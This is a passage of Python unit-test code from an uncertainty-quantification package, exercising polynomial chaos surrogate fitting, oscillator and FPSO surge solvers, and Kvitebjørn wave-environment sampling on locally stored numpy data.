y.append(data_set)
y_ecdf = uqhelpers.ECDF(np.array(y).T, alpha=iexcd_prob, is_expand=False)
filename = os.path.join(data_dir,'DoE_McsE6_PCE9_LASSOLARS_pf6_ecdf.pickle')
with open(filename, 'wb') as handle:
pickle.dump(y_ecdf, handle)
y_excd = []
for iexcd_prob in excd_prob:
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE9_OLSLARS.npy'.format(r)
print(r' - exceedance for y: {:s}'.format(filename))
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set)
y_ecdf = uqhelpers.ECDF(np.array(y).T, alpha=iexcd_prob, is_expand=False)
filename = os.path.join(data_dir,'DoE_McsE6_PCE9_OLSLARS_pf6_ecdf.pickle')
with open(filename, 'wb') as handle:
pickle.dump(y_ecdf, handle)
def test_bench4(self):
print('========================TESTING: BENCH 4 =======================')
data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/BENCH4/Data'
model_name = 'BENCH4'
# ### grid points
# x = np.linspace(-10,20,600).reshape((1,-1))
# solver = uqra.Solver(model_name, x)
# y = solver.run()
# res = np.concatenate((x,y), axis=0)
# np.save(os.path.join(data_dir,model_name.lower()), res)
### data from files
for r in range(10):
filename = 'DoE_McRE6R{:d}.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
zeta = data_set[0,:].reshape(1,-1)
x = data_set[1,:].reshape(1,-1)
solver = uqra.Solver(model_name, x)
y = solver.run()
np.save(os.path.join(data_dir,'DoE_McRE6R{:d}_y_None.npy'.format(r)), y)
def test_Solver(self):
x = np.arange(12).reshape(2,-1)
np.random.seed(100)
# x = (Hs,Tp) = np.array((4, 12)).reshape(2,1)
x = (Hs,Tp) = np.arange(12).reshape(2,-1)
solver = uqra.linear_oscillator()
print(solver)
y_raw, y_QoI = solver.run(x)
# print(y_raw.shape)
# print(y_QoI.shape)
# x = np.arange(30).reshape(3,10)
# solver = uqra.Ishigami()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30)
# solver = uqra.xsinx()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30)
# solver = uqra.poly4th()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30).reshape(2,15)
# solver = uqra.polynomial_square_root_function()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30).reshape(2,15)
# solver = uqra.four_branch_system()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30).reshape(2,15)
# solver = uqra.polynomial_product_function()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
### General Solver run testing
# print('========================TESTING: Solver =======================')
# model_name = 'linear_oscillator'
# kwargs = {
# 'time_max' : 100,
# 'dt' : 0.2,
# }
# tmax,dt = 1000, 0.1
# t = np.arange(0,tmax, dt)
# zeta = 0.01
# omega_n = 2 # rad/s
# m = 1
# k = (omega_n/2/np.pi) **2 * m
# c = zeta * 2 * np.sqrt(m * k)
# mck = (m,c,k)
# solver = uqra.Solver(model_name, x)
# y = solver.run(**kwargs)
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# np.save(os.path.join(data_dir,'Kvitebjørn_EC_P{:d}_{:d}'.format(P, nsim)), EC_y)
# ## run solver for EC cases
# P, nsim = 10, 25
# data_dir = '/Users/jinsongliu/BoxSync/MUSELab/uqra/uqra/environment'
# data_set = np.load(os.path.join(data_dir, 'Kvitebjørn_EC_P{:d}.npy'.format(P)))
# EC_x = data_set[2:,:]
# model_name = 'linear_oscillator'
# solver = uqra.Solver(model_name, EC_x)
# EC_y = np.array([solver.run(doe_method = 'EC') for _ in range(nsim)])
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# np.save(os.path.join(data_dir,'Kvitebjørn_EC_P{:d}_{:d}'.format(P, nsim)), EC_y)
# ## run solver for Hs Tp grid points
# nsim = 30
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# filename = 'HsTp_grid118.npy'
# data_set = np.load(os.path.join(data_dir, filename))
# model_name = 'linear_oscillator'
# solver = uqra.Solver(model_name, data_set)
# grid_out = np.array([solver.run(doe_method = 'GRID') for _ in range(nsim)])
# np.save(os.path.join(data_dir,'HsTp_grid118_out'), grid_out)
# data_set = np.load('DoE_McRE3R0.npy')
# x_samples = data_set[2:,:]
# model_name = 'linear_oscillator'
# solver = uqra.Solver(model_name, x_samples)
# kwargs = {'doe_method': 'MCS'}
# samples_y = solver.run(**kwargs )
# np.save('test_linear_oscillator_y', samples_y)
# # filename_tags = ['R0']
# # filename_tags = [itag+'_y' for itag in filename_tags]
# # uqra_dataio.save_data(samples_y, 'test_linear_oscillator', os.getcwd(), filename_tags)
# samples_y_stats = solver.get_stats()
# np.save('test_linear_oscillator_y_stats', samples_y_stats)
# # filename_tags = [itag+'_y_stats' for itag in filename_tags]
# # uqra_dataio.save_data(samples_y_stats, 'test_linear_oscillator', os.getcwd(), filename_tags)
def test_surrogate_model(self):
print('========================TESTING: SurrogateModel.fit(), ~Normal =======================')
solver1 = lambda x: x
solver2 = lambda x: x**2 + 1
solver3 = lambda x: x**3 + x**2 + x + 3
solver4 = lambda x: cp.Gamma(1,1).inv(cp.Normal(0,1).cdf(x))
solver5 = lambda x: cp.Gamma(1,1).inv(cp.Gamma(1,1).cdf(x))
upper_tail_probs= [0.999,0.9999,0.99999]
moment2cal = [1,2,3,4]
metrics2cal = [ 'explained_variance_score', 'mean_absolute_error', 'mean_squared_error',
'median_absolute_error', 'r2_score', 'r2_score_adj', 'moment', 'mquantiles']
sample_weight = None
multioutput = 'uniform_average'
# squared = True
solvers2test= [solver1,solver2,solver3, solver4, solver5]
solver_strs = ['x', '1 + x**2', '3 + x + x**2 + x**3', 'Gamma(1,1), Hermite', 'Gamma(1,1), Optimal']
poly_orders = range(2,5)
dist_zeta = cp.Normal()
dist_x = cp.Normal()
fit_method = 'GLK'
for isolver , isolver_str in zip(solvers2test, solver_strs):
for ipoly_order in poly_orders:
# uqra.blockPrint()
doe = uqra.QuadratureDesign(ipoly_order+1, ndim = 1, dist_names=['normal'])
doe.samples()
doe.x = doe.u
train_y = np.squeeze(isolver(doe.x))
train_y = np.array([train_y,train_y]).T
pce_model = uqra.PCE(ipoly_order, dist_zeta)
print(len(pce_model.basis[0]))
pce_model.fit(doe.u, train_y, w=doe.w, fit_method=fit_method)
pce_model.predict(doe.u, train_y, metrics=metrics2cal, prob=upper_tail_probs, moment=moment2cal, sample_weight=sample_weight, multioutput=multioutput)
# pce_model.fit(x_train, y_train, weight=x_weight)
# uqra.enablePrint()
# pce_model_scores = pce_model.score(x_train, y_train, metrics=metrics, moment=np.arange(1,5))
# print('Target: {}'.format(isolver_str))
# for i, ipoly_coeffs in enumerate(pce_model.poly_coeffs):
# print('{:<6s}: {}'.format('uqra'*(i==0), np.around(ipoly_coeffs,4)))
def test_LassoLars(self):
from sklearn import linear_model
from sklearn.linear_model import LassoCV, LassoLarsCV, LassoLarsIC, LassoLars
from sklearn import datasets
solver3 = lambda x: x**4 + x**2 + 3
np.random.seed(100)
dist_u = cp.Normal()
u_samples = dist_u.sample(1000)
y_samples = solver3(u_samples)
print('y mean: {}'.format(np.mean(y_samples)))
pce_model = uqra.PCE(10,dist_u)
pce_model.fit(u_samples, y_samples, method='LassoLars')
# print(pce_model.active_)
# print(pce_model.metamodels)
y_pred = pce_model.predict(u_samples.reshape(1,-1))
print(y_pred[:4])
pce_model.fit(u_samples, y_samples, method='OlsLars')
# print(pce_model.active_)
# print(pce_model.metamodels)
y_pred = pce_model.predict(u_samples.reshape(1,-1))
print(y_pred[:4])
def test_Kvitebjorn(self):
print('========================TESTING: Kvitebjorn =======================')
data_dir = '/Users/jinsongliu/BoxSync/MUSELab/uqra/uqra/environment'
# hs1 = np.linspace(0,2.9,291)
# hs2 = np.linspace(2.90,20, 1711)
# hs = np.hstack((hs1, hs2))
# hs_pdf = Kvitebjorn.hs_pdf(hs)
# np.save(os.path.join(data_dir, 'Kvitebjorn_hs'), np.vstack((hs, hs_pdf)))
# n = 1e6
# samples_x = Kvitebjorn.samples(n)
# np.save(os.path.join(data_dir, 'Kvitebjorn_samples_n'), samples_x)
# return EC from Kvitebjorn
P = 10
EC_samples = Kvitebjorn.EC(P)
np.save(os.path.join(data_dir, 'Kvitebjorn_EC_P{:d}'.format(P)), EC_samples)
# ## test cdf method for Kvitebjørn
# u = np.array([np.linspace(0,0.99999,11), np.linspace(0,0.99999,11)])
# x = Kvitebjorn.samples(u)
# u_= Kvitebjorn.cdf(x)
# print(np.around(u,2))
# print(np.around(x,2))
# print(np.around(u_,2))
# print('========================TESTING: SurrogateModel.fit(), Generalized ====================')
# gpce_dist_to_test = [cp.Normal(), cp.Normal(2,3), cp.Gamma(1,1), cp.Beta(1,1)]
# gpce_opt_dist = [cp.Normal(), cp.Normal(), cp.Gamma(1,1), cp.Beta(1,1)]
# gpce_opt_rule = ['hem', 'hem', 'lag', 'jacobi']
# npoly_orders = range(2,5)
# dist_zeta0 = cp.Normal()
# for i, igpce_dist in enumerate(gpce_dist_to_test):
# dist_zeta1 = gpce_opt_dist[i]
# print('>> Testing # {:d}: gpce: {}, zeta0: {} , zeta1: {}'.format(i, igpce_dist, dist_zeta0, dist_zeta1 ))
# for ipoly_order in npoly_orders:
# print(' Polynomial order: {:d}'.format(ipoly_order))
# ## gPCE with hermite chaos
# uqra.blockPrint()
# quad_doe = uqra.DoE('QUAD', 'hem', [ipoly_order+1], dist_zeta0)
# samples_zeta= quad_doe.get_samples()
# zeta_cor, zeta_weight = samples_zeta[0]
# x_cor = igpce_dist.inv(dist_zeta0.cdf(zeta_cor))
# zeta_poly, zeta_norms = cp.orth_ttr(ipoly_order, dist_zeta0, retall=True)
# x_hat,coeffs = cp.fit_quadrature(zeta_poly, zeta_cor, zeta_weight, np.squeeze(x_cor), retall=True)
# uqra.enablePrint()
# print('\t Hermite: {}'.format( np.around(coeffs,4)))
# ## gPCE with optimal chaos
# uqra.blockPrint()
# quad_doe = uqra.DoE('QUAD', gpce_opt_rule[i], [ipoly_order+1], dist_zeta1)
# samples_zeta= quad_doe.get_samples()
# zeta_cor, zeta_weight = samples_zeta[0]
# x_cor = igpce_dist.inv(dist_zeta1.cdf(zeta_cor))
# zeta_poly, zeta_norms = cp.orth_ttr(ipoly_order, dist_zeta1, retall=True)
# x_hat,coeffs = cp.fit_quadrature(zeta_poly, zeta_cor, zeta_weight, np.squeeze(x_cor), retall=True)
# uqra.enablePrint()
# print('\t Optimal: {}'.format( np.around(coeffs,4)))
def test_surrogate_model_scores(self):
print('========================TESTING: SurrogateModel.scores() =======================')
def test_absolute_truth_and_meaning(self):
assert True
def test_acfPsd(self):
## refer to file test_acfPsd.py
pass
def test_gen_gauss_time_series(self):
## refer to file test_gen_gauss_time_series
pass
def test_sdof_var(self):
## refer to file: test_sdof_var
pass
def test_poly5(self):
## refer to file: test_poly5
pass
def test_solver(self):
## refer to file: test_solver
pass
if __name__ == '__main__':
unittest.main()
```
#### File: UQRA/tests/test_Solver.py
```python
import uqra, unittest,warnings,os, sys
from tqdm import tqdm
import numpy as np, scipy as sp
from uqra.solver.PowerSpectrum import PowerSpectrum
from uqra.environment.Kvitebjorn import Kvitebjorn as Kvitebjorn
import uqra.utilities.helpers as uqhelper
from sklearn import datasets
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import KFold
import pickle
import scipy.stats as stats
import scipy.io
import multiprocessing as mp
warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
sys.stdout = uqra.utilities.classes.Logger()
data_dir = '/Users/jinsongliu/BoxSync/MUSELab/uqra/examples/JupyterNotebook'
class BasicTestSuite(unittest.TestCase):
"""Basic test cases."""
def test_sparse_poly(self):
print('========================TESTING: sparse poly =======================')
ndim = 1
deg = 4
poly = uqra.Legendre(d=ndim, deg=deg)
coef = [0,0,0,1,0]
solver = uqra.sparse_poly(poly, sparsity=4, coef=coef)
# x = np.random.normal(size=(ndim, 1000))
x = np.arange(10)
y = solver.run(x)
Leg2 = lambda x: 0.5*(3*x**2 - 1)/(poly.basis_norms[2])**0.5
Leg3 = lambda x: 0.5*(5*x**3 - 3*x)/(poly.basis_norms[3])**0.5
assert solver.ndim == ndim
assert solver.deg == deg
assert solver.coef == coef
assert np.array_equal(y,Leg3(x))
u = np.random.uniform(0,1,size=(2,100))
x = solver.map_domain(u, [stats.uniform(0,1),]*solver.ndim)
print(np.max(x))
print(np.min(x))
def test_bench4(self):
print('========================TESTING: BENCH 4 =======================')
data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/BENCH4/Data'
model_name = 'BENCH4'
# ### grid points
# x = np.linspace(-10,20,600).reshape((1,-1))
# solver = uqra.Solver(model_name, x)
# y = solver.run()
# res = np.concatenate((x,y), axis=0)
# np.save(os.path.join(data_dir,model_name.lower()), res)
### data from files
for r in range(10):
filename = 'DoE_McRE6R{:d}.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
zeta = data_set[0,:].reshape(1,-1)
x = data_set[1,:].reshape(1,-1)
solver = uqra.Solver(model_name, x)
y = solver.run()
np.save(os.path.join(data_dir,'DoE_McRE6R{:d}_y_None.npy'.format(r)), y)
def test_linear_oscillator(self):
random_seed = 100
np.random.seed(random_seed)
seeds_st = np.random.randint(0, int(2**31-1), size=20)
out_responses = [2]
out_stats = ['absmax']
m=1
c=0.1/np.pi
k=1.0/np.pi/np.pi
m,c,k = [stats.norm(m, 0.05*m), stats.norm(c, 0.2*c), stats.norm(k, 0.1*k)]
# env = uqra.Environment([stats.uniform, stats.norm])
env = uqra.Environment([2,])
# env = Kvitebjorn()
solver = uqra.linear_oscillator(m=m,c=c,k=k,excitation='spec_test1', environment=env, t=1000, t_transit=10,
out_responses=out_responses, out_stats=out_stats)
samples= solver.generate_samples(100)
y = solver.run(samples, seeds_st=seeds_st[:5] )
# for r in range(2):
# # filename = r'DoE_McsE6R{:d}.npy'.format(r)
# # data_dir = r'/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/MCS/Uniform/'
# # u = np.load(os.path.join(data_dir, filename))[:solver.ndim,:]
# # x = solver.map_domain(u, [stats.uniform(-1,2),] * solver.ndim)
# # print(np.mean(u, axis=1))
# # print(np.std(u, axis=1))
# # print(np.mean(x, axis=1))
# # print(np.std(x, axis=1))
# y_QoI = solver.run(samples, random_seed=random_seed)
# print(np.array(y_QoI).shape)
print(y.shape)
def test_surge(self):
random_seed = 100
out_responses = [2,3]
out_stats = ['absmax', 'mean']
m=1e8
k=280000
c=0.05*2*np.sqrt(k*m)
ltf = np.load('/Users/jinsongliu/BoxSync/MUSELab/uqra/uqra/solver/FPSO_ltf.npy')
qtf = np.load('/Users/jinsongliu/BoxSync/MUSELab/uqra/uqra/solver/FPSO_qtf.npy')
rao_= np.load('/Users/jinsongliu/BoxSync/MUSELab/uqra/uqra/solver/FPSO_RAO.npy')
print(ltf.shape)
print(qtf.shape)
print(rao_.shape)
# m,c,k = [stats.norm(m, 0.05*m), stats.norm(c, 0.2*c), stats.norm(k, 0.1*k)]
# env = uqra.Environment([stats.uniform, stats.norm])
# env = uqra.Environment([2,])
env = Kvitebjorn()
solver = uqra.surge_model(m=m,c=c,k=k, environment=env, t=4000, t_transit=100, dt=0.1, ltf=ltf[:2],
out_responses=out_responses, out_stats=out_stats)
samples= solver.generate_samples(10)
y = solver.run(samples)
# for r in range(2):
# # filename = r'DoE_McsE6R{:d}.npy'.format(r)
# # data_dir = r'/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/MCS/Uniform/'
# # u = np.load(os.path.join(data_dir, filename))[:solver.ndim,:]
# # x = solver.map_domain(u, [stats.uniform(-1,2),] * solver.ndim)
# # print(np.mean(u, axis=1))
# # print(np.std(u, axis=1))
# # print(np.mean(x, axis=1))
# # print(np.std(x, axis=1))
# y_QoI = solver.run(samples, random_seed=random_seed)
# print(np.array(y_QoI).shape)
print(y.shape)
def test_four_branch(self):
np.random.seed(100)
solver = uqra.four_branch_system()
data_dir_src = '/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/MCS/Normal/'
data_dir_destn = r'/Volumes/External/MUSE_UQ_DATA/Four_branch_system/Data'
for r in tqdm(range(10), ascii=True, desc=' -'):
filename = 'DoE_McsE6R{:d}.npy'.format(r)
u = np.load(os.path.join(data_dir_src, filename))[:solver.ndim, :]
x = solver.map_domain(u, [stats.norm(0,1),] * solver.ndim)
if not np.array_equal(u, x):
print(np.max(abs(u-x), axis=1))
y = solver.run(x).reshape(1,-1)
data = np.vstack((u,x,y))
np.save(os.path.join(data_dir_destn, filename), data)
def test_franke(self):
np.random.seed(100)
solver = uqra.franke()
data_dir_src = '/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/MCS/Uniform/'
data_dir_destn = r'/Volumes/External/MUSE_UQ_DATA/Franke/Data'
for r in tqdm(range(10), ascii=True, desc=' -'):
filename = 'DoE_McsE6R{:d}.npy'.format(r)
u = np.load(os.path.join(data_dir_src, filename))[:solver.ndim, :]
x = solver.map_domain(u, [stats.uniform(-1,2),] * solver.ndim)
if not np.array_equal(u, x):
print(np.max(abs(u-x), axis=1))
y = solver.run(x).reshape(1,-1)
data = np.vstack((u,x,y))
np.save(os.path.join(data_dir_destn, filename), data)
def test_duffing(self):
# f = lambda t: 8 * np.cos(0.5 * t)
np.random.seed(100)
dt = 0.01
out_responses = [1,2]
nsim = 1
out_stats = ['mean', 'std', 'skewness', 'kurtosis', 'absmax', 'absmin']
# solver = uqra.duffing_oscillator(m=1,c=0.2*np.pi,k=4*np.pi**2,s=np.pi**2, out_responses=out_responses, out_stats=out_stats, tmax=18000, dt=dt,y0=[1,0])
f = lambda t: 0.39 * np.cos(1.4 * t)
solver = uqra.duffing_oscillator(m=1,c=0.1,k=-1,s=1,excitation=f, out_responses=out_responses, out_stats=out_stats, tmax=18000, dt=dt,y0=[0,0])
x = solver.generate_samples(1)
print(solver)
print(x)
y = solver.run(x,return_raw=True)
# data_dir_src = '/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/Kvitebjorn/Normal/'
# data_dir_destn = r'/Volumes/External/MUSE_UQ_DATA/Duffing/Data/'
# for r in range(1):
# data = []
# filename = 'DoE_McsE6R{:d}.npy'.format(r)
# x = np.load(os.path.join(data_dir_src, filename))[:solver.ndim, :]
# # x = solver.map_domain(u, [stats.norm(0,1),] * solver.ndim)
# # y_raw, y_QoI = zip(*[solver.run(x.T) for _ in range(nsim)])
# y_raw, y_QoI = solver.run(x.T)
# # np.save('duffing_time_series_{:d}'.format(r), y_raw)
# filename = 'DoE_McsE6R{:d}_stats'.format(r)
# np.save(os.path.join(data_dir_destn, filename), y_QoI)
def test_FPSO(self):
Kvitebjorn = uqra.environment.Kvitebjorn()
data_dir_samples= r'/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples'
data_dir_result = os.path.join(r'/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/', solver.nickname)
# data_dir_samples= r'/home/jinsong/Documents/MUSE_UQ_DATA/Samples'
# data_dir_result = r'/home/jinsong/Documents/MUSE_UQ_DATA/FPSO_SDOF'
# ------------------------ Basic Check ----------------- ###
# solver = uqra.FPSO()
# x = np.array([2,4]).reshape(2,-1)
# y = solver.run(x)
# print('Hs = {}, Tp={}'.format(np.around(x[0]), np.around(x[1])))
## ------------------------ LHS ----------------- ###
# n_initial = 20
# solver = uqra.FPSO(phase=np.arange(20))
# Kvitebjorn= uqra.environment.Kvitebjorn()
# doe = uqra.LHS([stats.norm(),] * solver.ndim)
# u_lhs = doe.samples(size=n_initial, loc=0, scale=1, random_state=100)
# x_lhs = Kvitebjorn.ppf(stats.norm.cdf(u_lhs))
# y_lhs = solver.run(x_lhs)
# print(y_lhs.shape)
# data_lhs = np.concatenate((u_lhs, x_lhs, y_lhs), axis=0)
# np.save(os.path.join(data_dir_result, '{:s}_DoE_Lhs.npy'), data_lhs)
## ------------------------ MCS ----------------- ###
# MCS for DoE_McsE7R0
n = int(1e7)
for s in range(10):
solver = uqra.FPSO(random_state = s)
data_mcs_u = np.load(os.path.join(data_dir_samples, 'MCS', 'Norm', 'DoE_McsE7R{:d}.npy'.format(s)))
data_mcs_u = data_mcs_u[:solver.ndim, :n]
data_mcs_x = Kvitebjorn.ppf(stats.norm.cdf(data_mcs_u))
y = solver.run(data_mcs_x, verbose=True)
data = np.concatenate((data_mcs_u, data_mcs_x, y.reshape(1,-1)))
np.save(os.path.join(data_dir_result, '{:s}_McsE7R{:d}.npy'.format(solver.nickname,s)), data)
# ------------------------ Environmental Contour ----------------- ###
# solver = uqra.FPSO(random_state = np.arange(20))
# data_ec = np.load('/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/Kvitebjorn/Kvitebjorn_EC_50yr.npy')
# EC_u, EC_x = data_ec[:2], data_ec[2:]
# EC_y = solver.run(EC_x, verbose=True)
# EC2D_median = np.median(EC_y, axis=0)
# EC2D_data = np.concatenate((EC_u,EC_x,EC2D_median.reshape(1,-1)), axis=0)
# y50_EC_idx = np.argmax(EC2D_median)
# y50_EC = EC2D_data[:,y50_EC_idx]
# print('Extreme reponse from EC:')
# print(' {}'.format(y50_EC))
# np.save(os.path.join(data_dir_result, '{:s}_Kvitebjorn_EC2D_50yr.npy'.format(solver.nickname) ), EC2D_data)
# np.save(os.path.join(data_dir_result, '{:s}_Kvitebjorn_EC2D_50yr_y.npy'.format(solver.nickname)), EC_y)
## ------------------------ Environmental Contour ----------------- ###
# solver = uqra.FPSO(phase=np.arange(21))
# dataset = np.load('/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/FPSO_SDOF/Data/FPSO_Test_McsE7R0.npy')
# u, x = dataset[:2], dataset[2:4]
# y = solver.run(x, verbose=True)
# try:
# data = np.concatenate((u,x,y), axis=0)
# except ValueError:
# data = np.concatenate((u,x,y.reshape(1,-1)), axis=0)
# np.save(os.path.join(data_dir_result, 'FPSO_Test_McsE7R0.npy' ), data)
## ------------------------ Environmental Contour Bootstrap ----------------- ###
# print('------------------------------------------------------------')
# print('>>> Environmental Contour for Model: FPSO ')
# print('------------------------------------------------------------')
# filename = 'FPSO_DoE_EC2D_T50_y.npy'
# EC2D_data_y = np.load(os.path.join(data_dir_result, filename))[short_term_seeds_applied,:]
# filename = 'FPSO_DoE_EC2D_T50.npy'
# EC2D_data_ux= np.load(os.path.join(data_dir_result, filename))[:4,:]
# EC2D_median = np.median(EC2D_data_y, axis=0)
# EC2D_data = np.concatenate((EC2D_data_ux,EC2D_median.reshape(1,-1)), axis=0)
# y50_EC = EC2D_data[:,np.argmax(EC2D_median)]
# print(' > Extreme reponse from EC:')
# print(' - {:<25s} : {}'.format('EC data set', EC2D_data_y.shape))
# print(' - {:<25s} : {}'.format('y0', np.array(y50_EC[-1])))
# print(' - {:<25s} : {}'.format('Design state (u,x)', y50_EC[:4]))
# np.random.seed(100)
# EC2D_y_boots = uqra.bootstrapping(EC2D_data_y, 100)
# EC2D_boots_median = np.median(EC2D_y_boots, axis=1)
# y50_EC_boots_idx = np.argmax(EC2D_boots_median, axis=-1)
# y50_EC_boots_ux = np.array([EC2D_data_ux[:,i] for i in y50_EC_boots_idx]).T
# y50_EC_boots_y = np.max(EC2D_boots_median,axis=-1)
# y50_EC_boots = np.concatenate((y50_EC_boots_ux, y50_EC_boots_y.reshape(1,-1)), axis=0)
# y50_EC_boots_mean = np.mean(y50_EC_boots, axis=1)
# y50_EC_boots_std = np.std(y50_EC_boots, axis=1)
# print(' > Extreme reponse from EC (Bootstrap (n={:d})):'.format(EC2D_y_boots.shape[0]))
# print(' - {:<25s} : {}'.format('Bootstrap data set', EC2D_y_boots.shape))
# print(' - {:<25s} : [{:.2f}, {:.2f}]'.format('y50[mean, std]',y50_EC_boots_mean[-1], y50_EC_boots_std[-1]))
# print(' - {:<25s} : {}'.format('Design state (u,x)', y50_EC_boots_mean[:4]))
# u_center = y50_EC_boots_mean[ :2].reshape(-1, 1)
# x_center = y50_EC_boots_mean[2:4].reshape(-1, 1)
# print(' > Important Region based on EC(boots):')
# print(' - {:<25s} : {}'.format('Radius', radius_surrogate))
# print(' - {:<25s} : {}'.format('Center U', np.squeeze(u_center)))
# print(' - {:<25s} : {}'.format('Center X', np.squeeze(x_center)))
# print('================================================================================')
## ------------------------ Validation Dataset with shifted center ----------------- ###
# random_seed_short_term = np.arange(21)
# solver = uqra.FPSO(phase=random_seed_short_term)
# data = np.load(os.path.join(data_dir_samples, 'MCS', 'Norm', 'DoE_McsE7R0.npy' ))
# data = data[:solver.ndim, np.linalg.norm(data[:2], axis=0)<radius_surrogate]
# mcs_u = data[:solver.ndim,:int(1e5)]
# # data = np.load('/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/CLS/DoE_Cls2E7d2R0.npy')
# # mcs_u = data[:solver.ndim,:int(1e5)] * radius_surrogate
# mcs_u = mcs_u + u_center
# mcs_x = Kvitebjorn.ppf(stats.norm.cdf(mcs_u))
# print('--------------------------------------------------')
# print('>>> Running MCS ')
# print('--------------------------------------------------')
# print(' - u samples {}: mean [{}], std [{}] '.format(mcs_u.shape, np.around(np.mean(mcs_u, axis=1), 2), np.around(np.std(mcs_u, axis=1), 2)))
# print(' - x samples {}: mean [{}], std [{}] '.format(mcs_x.shape, np.around(np.mean(mcs_x, axis=1), 2), np.around(np.std(mcs_x, axis=1), 2)))
# mcs_y = solver.run(mcs_x, verbose=True)
# print(mcs_y.shape)
# mcs_data = np.concatenate((mcs_u, mcs_x, mcs_y.reshape(len(random_seed_short_term),-1)), axis=0)
# print(mcs_data.shape)
# np.save(os.path.join(data_dir_result, 'FPSO_DoE_McsE5R0.npy'), mcs_data)
# np.save(os.path.join(data_dir_result, 'FPSO_DoE_Cls2E5R0.npy'), mcs_data)
def test_samples_same(self):
for r in range(10):
filename = r'DoE_McsE6R{:d}.npy'.format(r)
print(filename)
data_dir = r'/Volumes/External/MUSE_UQ_DATA/Four_branch_system/Data/'
data1 = np.load(os.path.join(data_dir, filename))[:2,:]
data_dir = r'/Volumes/GoogleDrive/My Drive/MUSE_UQ_DATA/Samples/MCS/Normal/'
data2 = np.load(os.path.join(data_dir, filename))[:2,:]
print(np.array_equal(data1, data2))
# x = np.arange(30).reshape(3,10)
# solver = uqra.Ishigami()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30)
# solver = uqra.xsinx()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30)
# solver = uqra.poly4th()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30).reshape(2,15)
# solver = uqra.polynomial_square_root_function()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30).reshape(2,15)
# solver = uqra.four_branch_system()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
# x = np.arange(30).reshape(2,15)
# solver = uqra.polynomial_product_function()
# solver.run(x)
# print(solver)
# print(solver.y.shape)
### General Solver run testing
# print('========================TESTING: Solver =======================')
# model_name = 'linear_oscillator'
# kwargs = {
# 'time_max' : 100,
# 'dt' : 0.2,
# }
# tmax,dt = 1000, 0.1
# t = np.arange(0,tmax, dt)
# zeta = 0.01
# omega_n = 2 # rad/s
# m = 1
# k = (omega_n/2/np.pi) **2 * m
# c = zeta * 2 * np.sqrt(m * k)
# mck = (m,c,k)
# solver = uqra.Solver(model_name, x)
# y = solver.run(**kwargs)
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# np.save(os.path.join(data_dir,'Kvitebjørn_EC_P{:d}_{:d}'.format(P, nsim)), EC_y)
# ## run solver for EC cases
# P, nsim = 10, 25
# data_dir = '/Users/jinsongliu/BoxSync/MUSELab/uqra/uqra/environment'
# data_set = np.load(os.path.join(data_dir, 'Kvitebjørn_EC_P{:d}.npy'.format(P)))
# EC_x = data_set[2:,:]
# model_name = 'linear_oscillator'
# solver = uqra.Solver(model_name, EC_x)
# EC_y = np.array([solver.run(doe_method = 'EC') for _ in range(nsim)])
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# np.save(os.path.join(data_dir,'Kvitebjørn_EC_P{:d}_{:d}'.format(P, nsim)), EC_y)
# ## run solver for Hs Tp grid points
# nsim = 30
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# filename = 'HsTp_grid118.npy'
# data_set = np.load(os.path.join(data_dir, filename))
# model_name = 'linear_oscillator'
# solver = uqra.Solver(model_name, data_set)
# grid_out = np.array([solver.run(doe_method = 'GRID') for _ in range(nsim)])
# np.save(os.path.join(data_dir,'HsTp_grid118_out'), grid_out)
# data_set = np.load('DoE_McRE3R0.npy')
# x_samples = data_set[2:,:]
# model_name = 'linear_oscillator'
# solver = uqra.Solver(model_name, x_samples)
# kwargs = {'doe_method': 'MCS'}
# samples_y = solver.run(**kwargs )
# np.save('test_linear_oscillator_y', samples_y)
# # filename_tags = ['R0']
# # filename_tags = [itag+'_y' for itag in filename_tags]
# # uqra_dataio.save_data(samples_y, 'test_linear_oscillator', os.getcwd(), filename_tags)
# samples_y_stats = solver.get_stats()
# np.save('test_linear_oscillator_y_stats', samples_y_stats)
# # filename_tags = [itag+'_y_stats' for itag in filename_tags]
# # uqra_dataio.save_data(samples_y_stats, 'test_linear_oscillator', os.getcwd(), filename_tags)
if __name__ == '__main__':
unittest.main()
```
#### File: uqra/environment/Norway5.py
```python
import numpy as np
import scipy.stats as stats
import uqra
from ._envbase import EnvBase
class DistUw(object):
def __init__(self):
self.name = 'weibull'
